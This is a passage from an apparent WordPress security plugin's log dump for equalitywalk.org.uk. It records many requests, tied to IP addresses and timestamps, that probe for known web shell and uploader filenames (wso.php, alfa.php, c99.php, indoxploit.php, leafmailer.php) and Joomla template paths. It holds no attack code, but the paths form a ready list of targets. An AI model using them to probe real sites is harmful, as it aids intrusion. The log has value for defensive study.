,100,'VGUILctPCk04h96yE3MYnRml','','23|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651546.0574,10,'VGUILctPCk04h96yE3MYnRml','','709|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651546.5663,18,'t4wN1mZPFbJAV8xpTiEjXGDU','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651546.6703,100,'ZUrwbVdGg81vQLDe60MmxXpt','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651547.4062,100,'EMFJ7mRWBtyevC3IZ5l1Ajcb','','13|0|0|0|www.equalitywalk.org.uk/forum'),('185.65.134.166',3108079270,'',0,1674651547.4201,100,'sPUZVp2R1tQwBTvoDnYHrJOq','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651547.8455,18,'P9lsqAfyuOmeJk5xd73z6rHL','','13|0|0|0|www.equalitywalk.org.uk/wp-json/am-member/license'),('185.65.134.166',3108079270,'',0,1674651548.1779,100,'ZSkGTEhFHa0vWofnq7DC1zYi','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651549.1212,100,'gChAFycG7xbHaeqsOPN5p64J','','13|0|0|0|www.equalitywalk.org.uk/my-account/'),('185.65.134.166',3108079270,'',0,1674651549.8206,100,'5If3rW9ptgMYzGQ4u1VhEOkC','','13|0|0|0|www.equalitywalk.org.uk/index.php'),('185.65.134.166',3108079270,'',0,1674651550.3627,100,'WVScm8zMwurso3ZjKRGNvQxq','','13|0|0|0|www.equalitywalk.org.uk/index.php/video'),('185.65.134.166',3108079270,'',0,1674651550.5184,18,'vQHd7bKOgt0WNshCiwY3ATJ1','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651550.5246,100,'NhcQVq7CejZILiAxpX6813OG','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651550.8050,100,'ZTakKPjY2XCVLvfpsuoFJRci','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651550.8611,18,'hyMeawCOHoqGmAg625Qf3pzW','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651550.8989,18,'NomuBCKsTWd8S79Ik6VcFGEh','','13|0|0|0|www.equalitywalk.org.uk/wp-json/visualizer/v1/upload-data'),('185.65.134.166',3108079270,'',0,1674651550.9533,18,'IVSz3ts2HkWi4OdyuJQpBxnU','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651551.1366,100,'mZGOA3lFhQXKJxzUWopyCI7e','','13|0|0|0|www.equalitywalk.org.uk/'),('185.65.134.166',3108079270,'',0,1674651554.6053,18,'5VkhXCPbOjB0ZWSed1lFm34T','','13|0|0|0|www.equalitywalk.org.uk/wp-comments-post.php'),('91.134.248.249',1535572217,'',0,1674655140.4783,55,'br2AtydFuQ0sxUvjfKZYTVMX','','19|0|0|0|equalitywalk.org.uk/wp-readme.php'),('20.231.18.49',350687793,'',0,1674656776.4344,55,'J7v68yZPNC9Kc5Qe0MzLIldw','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('20.231.18.49',350687793,'',0,1674656796.9899,55,'Mxb5US2vZK73Tg4fCn80OyrH','','19|0|0|0|www.equalitywalk.org.uk/D2c5D.php'),('20.231.18.49',350687793,'',0,1674656802.9367,55,'XSAvsz3an6OEDIcV1ltrPy2d','','19|0|0|0|www.equalitywalk.org.uk//wp-plain.php'),('20.231.18.49',350687793,'',0,1674656808.9463,55,'fePBIcJqdOFExaMZrQl2zUgh','','19|0|0|0|www.equalitywalk.org.uk//D2c5D.php'),('162.241.27.55',2733710135,'',0,1674659575.9978,55,'SaCr0qBjoNvcW3dbPMVJisUH','','19|0|0|0|equalitywalk.org.uk/wp-includes/fonts/index.php'),('20.231.18.49',350687793,'',0,1674671315.4221,55,'uERoUQxispC0AdFwbY5GZM2g','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('20.231.18.49',350687793,'',0,1674671324.5735,55,'N9kwF3o8s4pM56TuADac0YSz','','19|0|0|0|www.equalitywalk.org.uk/7edCF.php'),('20.231.18.49',350687793,'',0,1674671330.3789,55,'21TKiqaJCkFWnfxbOULudpIV','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('20.231.18.49',350687793,'',0,1674671335.3777,55,'vT5tHIBx4RdJghX70Yi8DGVz','','19|0|0|0|www.equalitywalk.org.uk/7edCF.php'),('182.2.36.24',3053593624,'',0,1674671781.6424,55,'L0xQcwfpOJq1WSzAd5tvgPsG','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('182.2.37.20',3053593876,'',0,1674671789.5749,55,'kN6SCLGsdaYIDW7XgoEyz5bp','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('182.2.36.24',3053593624,'',0,1674671795.5399,55,'9uDVKyrLpStZmw8ePf5sU4jq','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('182.2.37.20',3053593876,'',0,1674671802.4228,55,'kzBjQcap8XY9JEH2dLwIty1b','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('182.2.37.20',3053593876,'',0,1674671872.0926,55,'keGtmBdTsf2PnoIa9CphSRy5','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('182.2.37.8',3053593864,'',0,1674671880.0272,55,'Ye2hoEt6SqjxWwi3RnlHbfJk','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('182.2.37.8',3053593864,'',0,1674671885.0848,55,'aZUYVR8jL1z5mB3lFxwKyurP','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('3.26.169.116',52078964,'',0,1674673772.9915,55,'IAGMhb7jVOKr8fzse0u3R9kZ','','19|0|0|0|www.equalitywalk.org.uk/shell4.php'),('3.26.169.116',52078964,'',0,1674673775.0623,55,'VlKQMIvqTRAUstXGaum7fk3z','','19|0|0|0|www.equalitywalk.org.uk/ups.php'),('3.26.169.116',52078964,'',0,1674673777.3381,55,'Nar63i9BY54FD0OjfynJsk2I','','19|0|0|0|www.equalitywalk.org.uk/ru.php'),('3.26.169.116',52078964,'',0,1674673779.3891,55,'EqBgS3Wev0GuiTQJlxbkMjdU','','19|0|0|0|www.equalitywalk.org.uk/if.php'),('3.26.169.116',52078964,'',0,1674673781.4857,55,'aG3n7BmUloKiP1cO5fTrY0ZE','','19|0|0|0|www.equalitywalk.org.uk/vuln.php'),('3.26.169.116',52078964,'',0,1674673781.5284,10,'aG3n7BmUloKiP1cO5fTrY0ZE','','707|0|0|0|www.equalitywalk.org.uk/vuln.php'),('3.26.169.116',52078964,'',0,1674673783.6272,55,'c1klWjDA0RwmBO68ZbunPV2I','','19|0|0|0|www.equalitywalk.org.uk/fw.php'),('3.26.169.116',52078964,'',0,1674673785.7176,55,'AQyKcFd96XfNksu4xUtVWvOb','','19|0|0|0|www.equalitywalk.org.uk/skipper.php'),('3.26.169.116',52078964,'',0,1674673787.8042,55,'wChD4nX2Y67kNBFtJUE3lySm','','19|0|0|0|www.equalitywalk.org.uk/skippershell.php'),('3.26.169.116',52078964,'',0,1674673789.8391,55,'GXZaT6lE3UPvdNpAY07FsjJH','','19|0|0|0|www.equalitywalk.org.uk/tttt.php'),('3.26.169.116',52078964,'',0,1674673791.9395,55,'oCQMu1t9VnI5jc30zXUENKkf','','19|0|0|0|www.equalitywalk.org.uk/tshop.php'),('3.26.169.116',52078964,'',0,1674673794.1894,55,'u12kz8XFJ3cwBR9AfVoNPyIx','','19|0|0|0|www.equalitywalk.org.uk/alfa.php'),('3.26.169.116',52078964,'',0,1674673796.2859,55,'n8tP1SgL9rwCcY0ROf7MNs4q','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('3.26.169.116',52078964,'',0,1674673798.2955,55,'XH9IhjVg0EkSpcfAztiF8wNy','','19|0|0|0|www.equalitywalk.org.uk/inje3ctor.php'),('3.26.169.116',52078964,'',0,1674673800.3819,55,'sLB8DnVdSWqo0Uc34MHZKN1h','','19|0|0|0|www.equalitywalk.org.uk/saudi.php'),('3.26.169.116',52078964,'',0,1674673802.4676,55,'PtxsqYX6wHJgjFeGZQMuVAI4','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('3.26.169.116',52078964,'',0,1674673804.5095,55,'TASOvaV9UlufmN3IKJLZBznH','','19|0|0|0|www.equalitywalk.org.uk/alfashell.php'),('3.26.169.116',52078964,'',0,1674673806.5746,55,'y2wElhQMovFxOI6RYJnGTkLD','','19|0|0|0|www.equalitywalk.org.uk/my_alfa.php'),('3.26.169.116',52078964,'',0,1674673808.7012,55,'pB8C4lRzw2ajUVQ9FbTiLqJ7','','19|0|0|0|www.equalitywalk.org.uk/uploader.php'),('3.26.169.116',52078964,'',0,1674673810.7854,55,'YcoBizTW5r8mAd0y9DQ6JVUX','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('3.26.169.116',52078964,'',0,1674673813.0721,55,'owX0AUOqkPDiEuygJ6NFn3VH','','19|0|0|0|www.equalitywalk.org.uk/hacked.php'),('3.26.169.116',52078964,'',0,1674673815.2102,55,'8CFOqvyjSoGLBw91lHhsQpu6','','19|0|0|0|www.equalitywalk.org.uk/c99.php'),('3.26.169.116',52078964,'',0,1674673817.2317,55,'CK3NAWhTuxmPU4sFgXISaqM0','','19|0|0|0|www.equalitywalk.org.uk/priv8.php'),('3.26.169.116',52078964,'',0,1674673819.2690,55,'ucRHrGLtjn3hSDmC6Ub4qP1g','','19|0|0|0|www.equalitywalk.org.uk/Navir.php'),('3.26.169.116',52078964,'',0,1674673821.3088,55,'GpDT168HAIbQCZLWR2UNniqx','','19|0|0|0|www.equalitywalk.org.uk/cmd13.php'),('3.26.169.116',52078964,'',0,1674673823.3820,55,'s3rLnwhxlBMGCRQ469SkEPf0','','19|0|0|0|www.equalitywalk.org.uk/inc20k1.php'),('3.26.169.116',52078964,'',0,1674673825.4515,55,'NPUkhHX9KlI7dVwm4SbBELC2','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('3.26.169.116',52078964,'',0,1674673827.5664,55,'REz9hcraylU6FeQBXvN2Ciqj','','19|0|0|0|www.equalitywalk.org.uk/404.php'),('3.26.169.116',52078964,'',0,1674673829.6328,55,'JbQAZhkNe9cEtPwfOrovD246','','19|0|0|0|www.equalitywalk.org.uk/swm.php'),('3.26.169.116',52078964,'',0,1674673831.7568,55,'2A3V1DHSO0hP7cv98kQCadtp','','19|0|0|0|www.equalitywalk.org.uk/wp.php'),('3.26.169.116',52078964,'',0,1674673833.9337,55,'sMeuIbCSR71dkyJfcO6v0BF9','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('3.26.169.116',52078964,'',0,1674673836.0030,55,'Zqlk49IHAVDfdGe0MuyEv6rR','','19|0|0|0|www.equalitywalk.org.uk/shx.php'),('3.26.169.116',52078964,'',0,1674673838.1160,55,'6va9EsRI3yoYX1uAhP4WpOnt','','19|0|0|0|www.equalitywalk.org.uk/ws.php'),('3.26.169.116',52078964,'',0,1674673840.2184,55,'FQX2dkm801WryaKZuhft6IYs','','19|0|0|0|www.equalitywalk.org.uk/m.php'),('3.26.169.116',52078964,'',0,1674673842.3312,55,'omNB5vajP4dCQLUI0c6tJZAO','','19|0|0|0|www.equalitywalk.org.uk/edit-form.php'),('3.26.169.116',52078964,'',0,1674673844.4362,55,'F3WZ0GpwslYQk5ijIS1EV8oz','','19|0|0|0|www.equalitywalk.org.uk/LEAF.php'),('3.26.169.116',52078964,'',0,1674673846.4620,55,'6zN8CGT2Sn9BhdLRma1tQ0oX','','19|0|0|0|www.equalitywalk.org.uk/leafmailer.php'),('3.26.169.116',52078964,'',0,1674673848.7631,55,'1Nbv0FPrRHI6OSxUXJyC4lgz','','19|0|0|0|www.equalitywalk.org.uk/mailer.php'),('3.26.169.116',52078964,'',0,1674673850.8823,55,'2Zeul3DhNkMzTwAjqPmosLYJ','','19|0|0|0|www.equalitywalk.org.uk/leafmailer2.8.php'),('3.26.169.116',52078964,'',0,1674673852.9628,55,'4rEdXYTeLMx6Z0uiBGRQt8ko','','19|0|0|0|www.equalitywalk.org.uk/Leaf.php'),('3.26.169.116',52078964,'',0,1674673855.0561,55,'KA8HjLUJpg2bwx51aODuTeSz','','19|0|0|0|www.equalitywalk.org.uk/leaf.php'),('3.26.169.116',52078964,'',0,1674673857.1862,55,'nBWJUtiAGHcIove5jMz96Y2w','','19|0|0|0|www.equalitywalk.org.uk/x.php'),('3.26.169.116',52078964,'',0,1674673859.2655,55,'p5WOAETcGUyHMKmot4eQdPIS','','19|0|0|0|www.equalitywalk.org.uk/srx.php'),('3.26.169.116',52078964,'',0,1674673861.3514,55,'JpSKOkjBbm0oHq9IChrPsAwv','','19|0|0|0|www.equalitywalk.org.uk/1337.php'),('3.26.169.116',52078964,'',0,1674673863.4393,55,'Rq7Nsx40AZTUboMaDLcpYfSX','','19|0|0|0|www.equalitywalk.org.uk/xx.php'),('3.26.169.116',52078964,'',0,1674673865.5044,55,'6o9YOvJQ5yuh13x0bUsle2Vr','','19|0|0|0|www.equalitywalk.org.uk/XxX.php'),('3.26.169.116',52078964,'',0,1674673867.5409,55,'1CyZwipl0vzhVRrG7JD6bSNP','','19|0|0|0|www.equalitywalk.org.uk/lf.php'),('3.26.169.116',52078964,'',0,1674673869.7355,55,'OXedYsr10mE6xaD3kpHQWyGS','','19|0|0|0|www.equalitywalk.org.uk/alex.php'),('3.26.169.116',52078964,'',0,1674673871.7845,55,'EN7paOqg8U6eGzuoHf5dnSZY','','19|0|0|0|www.equalitywalk.org.uk/new.php'),('3.26.169.116',52078964,'',0,1674673873.8337,55,'b1rsza3jvwUuxcQyn49lehFV','','19|0|0|0|www.equalitywalk.org.uk/marijuana.php'),('3.26.169.116',52078964,'',0,1674673875.9251,55,'NvnReQDW8T4uXgbdfxCm9zh7','','19|0|0|0|www.equalitywalk.org.uk/gaza.php'),('3.26.169.116',52078964,'',0,1674673877.9877,55,'fKHWIqUmpcnGEetB49zZrhLJ','','19|0|0|0|www.equalitywalk.org.uk/wp-admin.php'),('3.26.169.116',52078964,'',0,1674673880.0452,55,'geLIc2nmMNOjd1tbKJGH30yY','','19|0|0|0|www.equalitywalk.org.uk/3index.php'),('3.26.169.116',52078964,'',0,1674673882.1133,55,'taMe8uJK6dWvEsgRowQNV4jb','','19|0|0|0|www.equalitywalk.org.uk/wikindex.php'),('3.26.169.116',52078964,'',0,1674673884.1934,55,'opfXNWdwCqZDHujist9SnF2m','','19|0|0|0|www.equalitywalk.org.uk/wso1.php'),('3.26.169.116',52078964,'',0,1674673886.3234,55,'3rIhHlETBMS8qFYv1ZmCw57L','','19|0|0|0|www.equalitywalk.org.uk/bb.php'),('3.26.169.116',52078964,'',0,1674673888.4131,55,'lao2wXCH6QiUfRWPty3bYgAM','','19|0|0|0|www.equalitywalk.org.uk/Lux.php'),('3.26.169.116',52078964,'',0,1674673890.4698,55,'Isqc2oJMkNjVnb736aOvFh1e','','19|0|0|0|www.equalitywalk.org.uk/haxor.php'),('212.227.176.155',3571691675,'',0,1674690108.6047,55,'dGwjv8ipDQ6RxHyuWXAztMbB','','19|0|0|0|www.equalitywalk.org.uk/wso112233.php'),('212.227.176.155',3571691675,'',0,1674690116.4832,55,'jmlEWPMIQbuzn2pvDk95fR0F','','19|0|0|0|www.equalitywalk.org.uk/bala.php'),('212.227.176.155',3571691675,'',0,1674690130.9770,55,'5ABPzHUv09cXgG4VO3E6Td2W','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('212.227.176.155',3571691675,'',0,1674690134.6816,55,'nVxBoMUOClXkjf6RciShy2HJ','','19|0|0|0|www.equalitywalk.org.uk/xleet-shell.php'),('212.227.176.155',3571691675,'',0,1674690137.7636,55,'Rrbi3Gnjflm4skZ59qPeVNWJ','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/xleet-shell.php'),('212.227.176.155',3571691675,'',0,1674690137.8537,10,'Rrbi3Gnjflm4skZ59qPeVNWJ','','707|0|0|0|www.equalitywalk.org.uk/wp-admin/xleet-shell.php'),('196.74.207.174',3293237166,'',0,1674715047.4982,55,'h3UwjlN908SBP6cQgZx5JIzC','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('196.74.207.174',3293237166,'',0,1674715050.2594,55,'VaPxrGKXIth3SOd7H2qbl6iL','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('196.74.207.174',3293237166,'',0,1674715050.8819,55,'5p9AIBSR0yJ42YPhsdaltXum','','19|0|0|0|www.equalitywalk.org.uk/shells.php'),('196.74.207.174',3293237166,'',0,1674715052.4702,55,'BzQiCyTNK85xw9tjlZfGAROn','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('196.74.207.174',3293237166,'',0,1674715054.0676,55,'ejGSWAuaHXOkqEZ7f5hUNJwI','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/alfa.php'),('196.74.207.174',3293237166,'',0,1674715054.2131,10,'ejGSWAuaHXOkqEZ7f5hUNJwI','','707|0|0|0|www.equalitywalk.org.uk/wp-admin/alfa.php'),('196.74.207.174',3293237166,'',0,1674715054.7840,55,'ok7pfsaYZtlq5hDNVMA3wubr','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('196.74.207.174',3293237166,'',0,1674715055.9618,55,'gynY3qQsdxt16olfRaV085XE','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/fw.php'),('196.74.207.174',3293237166,'',0,1674715057.8839,55,'fGXbICxnDVrAo1PwBm8d3Rz7','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/fw.php'),('196.74.207.174',3293237166,'',0,1674715060.4282,55,'v6lDmA8MgJtn1dNXfwxBbGOK','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wso.php'),('196.74.207.174',3293237166,'',0,1674715061.7794,55,'cINGz8kTLiQ0mgBVS6FJApER','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/wso.php'),('196.74.207.174',3293237166,'',0,1674715062.3362,55,'y4GbcXxWFhYowdBK3sR0fvHU','','19|0|0|0|www.equalitywalk.org.uk/wp-22.php'),('196.74.207.174',3293237166,'',0,1674715062.8885,55,'60O8czSJxTKsftjL2briyk1U','','19|0|0|0|www.equalitywalk.org.uk/alfa.php'),('196.74.207.174',3293237166,'',0,1674715063.4780,55,'cSnHL6ElG9hXiTdOWm4IfCB0','','19|0|0|0|www.equalitywalk.org.uk/fw.php'),('196.74.207.174',3293237166,'',0,1674715064.0195,55,'JBTxYLDKZd2uWzMq4oGXi6kg','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('109.248.175.137',1845014409,'',0,1674720800.8767,55,'Ftm2Y3nDiBuoHxsPa7TNCJzl','','19|0|0|0|www.equalitywalk.org.uk/bala.php'),('196.74.207.174',3293237166,'',0,1674721235.3365,55,'4LWrfBysGMOiZCk36d2cjXKh','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/modules.php'),('196.74.207.174',3293237166,'',0,1674721259.4827,55,'7ezpCZU9cGklb5wduigHS0sN','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('196.74.207.174',3293237166,'',0,1674721269.0452,55,'QO4wxFpXnfrs1NWdjlBECqoL','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/shapes.php'),('196.74.207.174',3293237166,'',0,1674721269.8301,55,'zh8EvXSRNZqia0YQnl1VsUCo','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('196.74.207.174',3293237166,'',0,1674721273.6639,55,'rT4OAU6MsuQoLm0iCaKHY8Jv','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('196.74.207.174',3293237166,'',0,1674721273.7038,10,'rT4OAU6MsuQoLm0iCaKHY8Jv','','707|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('196.74.207.174',3293237166,'',0,1674721277.4442,55,'3WSIozQ84OLXxvfqRPdNceiK','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('196.74.207.174',3293237166,'',0,1674721279.0996,55,'rQHgIu0sPnVXxLt9KkWJh7w1','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('196.74.207.174',3293237166,'',0,1674721285.2071,55,'Id9EbJBFXSqeD50l4hYcpHTN','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('196.74.207.174',3293237166,'',0,1674721286.4965,55,'EH30QFUchNuM1zVT4XnWi8Gg','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/network/wp-footer.php'),('196.74.207.174',3293237166,'',0,1674721288.0320,55,'8pVCOKyFSEvUgAbkrDdGcaX7','','19|0|0|0|www.equalitywalk.org.uk/wp-info.php'),('196.74.207.174',3293237166,'',0,1674721292.1876,55,'NQgxjkZdJFzEy5A7vqhLReuM','','19|0|0|0|www.equalitywalk.org.uk/upel.php'),('196.74.207.174',3293237166,'',0,1674721295.9558,55,'hR8dFTaZcn2tPHl9LmbBKg1j','','19|0|0|0|www.equalitywalk.org.uk/098.php'),('196.74.207.174',3293237166,'',0,1674721297.5532,55,'iPxspLdRkncF4UZq50EoStmQ','','19|0|0|0|www.equalitywalk.org.uk/V5.php'),('196.74.207.174',3293237166,'',0,1674721298.7388,55,'gpAlrLq9BP1Xf4m7eot3nEbj','','19|0|0|0|www.equalitywalk.org.uk/new_license.php'),('196.74.207.174',3293237166,'',0,1674721304.5980,55,'EW3vxtCujKGikOf7gs4lUTab','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('196.74.207.174',3293237166,'',0,1674721305.9542,55,'VMLbd7ZzjSO6C0Qh43IHJNgR','','19|0|0|0|www.equalitywalk.org.uk/modules/modules/modules.php'),('196.74.207.174',3293237166,'',0,1674721307.0184,55,'JuwngZirvmaMRtVb3sjQKYIA','','19|0|0|0|www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php'),('196.74.207.174',3293237166,'',0,1674721313.4694,55,'NJyxFauS2gd9qmG8rTWDsHeI','','19|0|0|0|www.equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php'),('196.74.207.174',3293237166,'',0,1674721314.5924,55,'cNHLoD7gwYZTe68pI4KCrUv5','','19|0|0|0|www.equalitywalk.org.uk/libraries/joomla/css.php'),('196.74.207.174',3293237166,'',0,1674721315.9946,100,'HnW5mjJrqhf2STPc7bDioGwa','','13|0|0|0|www.equalitywalk.org.uk/libraries/joomla/jmails.php'),('196.74.207.174',3293237166,'',0,1674721316.7486,100,'Y2FHTL8ly5i3mkq1U7vMAuN9','','13|0|0|0|www.equalitywalk.org.uk/libraries/joomla/jmail.php'),('196.74.207.174',3293237166,'',0,1674721318.2343,55,'R8FqKYPTfkXplmiIwMdbQZjS','','19|0|0|0|www.equalitywalk.org.uk/images/vuln.php'),('196.74.207.174',3293237166,'',0,1674721319.8153,55,'6qiHloJkXTuOjM2CEY5GW7Nc','','19|0|0|0|www.equalitywalk.org.uk/tmp/vuln.php'),('196.74.207.174',3293237166,'',0,1674721321.3371,55,'ZTmeJrGNDtkOBiLwl4WFCHa9','','19|0|0|0|www.equalitywalk.org.uk/XxX.php'),('196.74.207.174',3293237166,'',0,1674721322.1089,55,'SsnCa9J3ExF1ZbwV5uDM8lhj','','19|0|0|0|www.equalitywalk.org.uk/Marvins.php'),('196.74.207.174',3293237166,'',0,1674721323.2542,100,'ui4EbMxLQrqlOVDNs2HmgURG','','13|0|0|0|www.equalitywalk.org.uk/rxr.php'),('196.74.207.174',3293237166,'',0,1674721324.2211,55,'w1kXzHBv6eyVI0CYg5KcNFmb','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('196.74.207.174',3293237166,'',0,1674721326.0092,55,'adRtevPi8CcW0xqQupsfFVoz','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('196.74.207.174',3293237166,'',0,1674721327.2969,55,'qnzv7F9msiXT8yBrS43Pbhpu','','19|0|0|0|www.equalitywalk.org.uk/error.php'),('196.74.207.174',3293237166,'',0,1674721328.7892,55,'4wbuetXBQ56cdPZvNGpjSCDI','','19|0|0|0|www.equalitywalk.org.uk/RxR.php'),('196.74.207.174',3293237166,'',0,1674721330.2745,55,'viClj8cRuYMUNwtKgkoP4QFz','','19|0|0|0|www.equalitywalk.org.uk/components/com_b2jcontact/izoc.php'),('196.74.207.174',3293237166,'',0,1674721331.0686,55,'GHzeVJADf6Nck5rmbUq2BSda','','19|0|0|0|www.equalitywalk.org.uk/V3.php'),('196.74.207.174',3293237166,'',0,1674721332.1591,55,'6JfzRt2hvF8MiIEV3ndLZmaq','','19|0|0|0|www.equalitywalk.org.uk/V5.php'),('196.74.207.174',3293237166,'',0,1674721344.6310,55,'EGAImxBUwTkM1Q65nCd2q0up','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('196.74.207.174',3293237166,'',0,1674721346.0794,55,'XVzD5GUrNI41JHFRnp9g7Lws','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('196.74.207.174',3293237166,'',0,1674721347.0940,55,'820uBQviFTjSOMKdZ9fnI1pg','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('196.74.207.174',3293237166,'',0,1674721347.8298,55,'gVjxqU1P4yMa0NTmh8nSDvw2','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/bluestork/index.php'),('196.74.207.174',3293237166,'',0,1674721349.3370,55,'LvEJr5SVdyoqgBYejf1WHa4b','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/bluestork/error.php'),('196.74.207.174',3293237166,'',0,1674721350.9119,55,'bQPEMu7SOlAoqRnciF0IdzgC','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/hathor/index.php'),('196.74.207.174',3293237166,'',0,1674721351.7532,55,'Ni0AUd8ycQz65tYRZKeCgFlp','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/hathor/error.php'),('196.74.207.174',3293237166,'',0,1674721354.1365,55,'0ZmlNrpskcVHd6qx9vJCB2D1','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/isis/index.php'),('196.74.207.174',3293237166,'',0,1674721355.4021,55,'4IqvB8ozlMJjuFWK1QfXtTRG','','19|0|0|0|www.equalitywalk.org.uk/administrator/templates/isis/error.php'),('196.74.207.174',3293237166,'',0,1674721357.7504,55,'ukNrqWg6clEvsnj93dyTMmBf','','19|0|0|0|www.equalitywalk.org.uk/templates/beez/index.php'),('196.74.207.174',3293237166,'',0,1674721359.9158,55,'DWwgS4BmpQEOJNTtXG7Mc1Pf','','19|0|0|0|www.equalitywalk.org.uk/templates/ja_purity/index.php'),('196.74.207.174',3293237166,'',0,1674721362.0747,55,'JAUY64821sjykvIw5tHxGRlg','','19|0|0|0|www.equalitywalk.org.uk/templates/rhuk_milkyway/index.php'),('196.74.207.174',3293237166,'',0,1674721366.2101,55,'VBnYQWMZrNHbwoymRKXODigU','','19|0|0|0|www.equalitywalk.org.uk/templates/system/index.php'),('196.74.207.174',3293237166,'',0,1674721367.9112,55,'eT2CtsB9RlL8ny1VxfAJOD4a','','19|0|0|0|www.equalitywalk.org.uk/templates/system/error.php'),('196.74.207.174',3293237166,'',0,1674721369.3222,55,'NKWUlT4hVJq1Pv6Am2nRieX5','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/index.php'),('196.74.207.174',3293237166,'',0,1674721370.6561,55,'pKQdrlxmVsPLeTCcUJD38ybk','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/error.php'),('196.74.207.174',3293237166,'',0,1674721371.7782,55,'PxaqSiF5uLeC29tEpThRIyfk','','19|0|0|0|www.equalitywalk.org.uk/templates/beez5/index.php'),('196.74.207.174',3293237166,'',0,1674721373.2455,55,'zKrlDAGqi1EVP7ZkC43vywhQ','','19|0|0|0|www.equalitywalk.org.uk/templates/beez5/error.php'),('196.74.207.174',3293237166,'',0,1674721374.1448,55,'IzodMU37jhgrNH1tKRLPynSx','','19|0|0|0|www.equalitywalk.org.uk/templates/beez_20/index.php'),('196.74.207.174',3293237166,'',0,1674721376.9091,55,'lYiFAPwyrj62nUasfGSgJZuo','','19|0|0|0|www.equalitywalk.org.uk/templates/beez_20/error.php'),('196.74.207.174',3293237166,'',0,1674721377.6530,55,'WbO8odHZY5wfzeiMB7DFvchE','','19|0|0|0|www.equalitywalk.org.uk/templates/protostar/index.php'),('196.74.207.174',3293237166,'',0,1674721378.9767,55,'a5d7T0crBPbul4WS6tNZxoUQ','','19|0|0|0|www.equalitywalk.org.uk/templates/protostar/error.php'),('196.74.207.174',3293237166,'',0,1674721379.7373,55,'uSHAlO7Wtzwg1kFhRXBVTiYI','','19|0|0|0|www.equalitywalk.org.uk/templates/atomic/index.php'),('196.74.207.174',3293237166,'',0,1674721380.7864,55,'MPLXmip023aFqkvKNnl51HjW','','19|0|0|0|www.equalitywalk.org.uk/templates/atomic/error.php'),('196.74.207.174',3293237166,'',0,1674721382.2004,55,'zNPqFAD1SvTdxZmMeRylOJkB','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('196.74.207.174',3293237166,'',0,1674721383.0208,55,'nigsaKEcqBpYh6kmtSNr1zye','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('196.74.207.174',3293237166,'',0,1674721386.1725,55,'Becbs5dkEg8XxGUAFwjK2ORH','','19|0|0|0|www.equalitywalk.org.uk/indoxploit.php'),('196.74.207.174',3293237166,'',0,1674721387.4392,55,'b15otYanuqAWJC6icRezP38K','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('196.74.207.174',3293237166,'',0,1674721404.2090,55,'ftwJgMqz0FpX8xUQLYnmyOjl','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('196.74.207.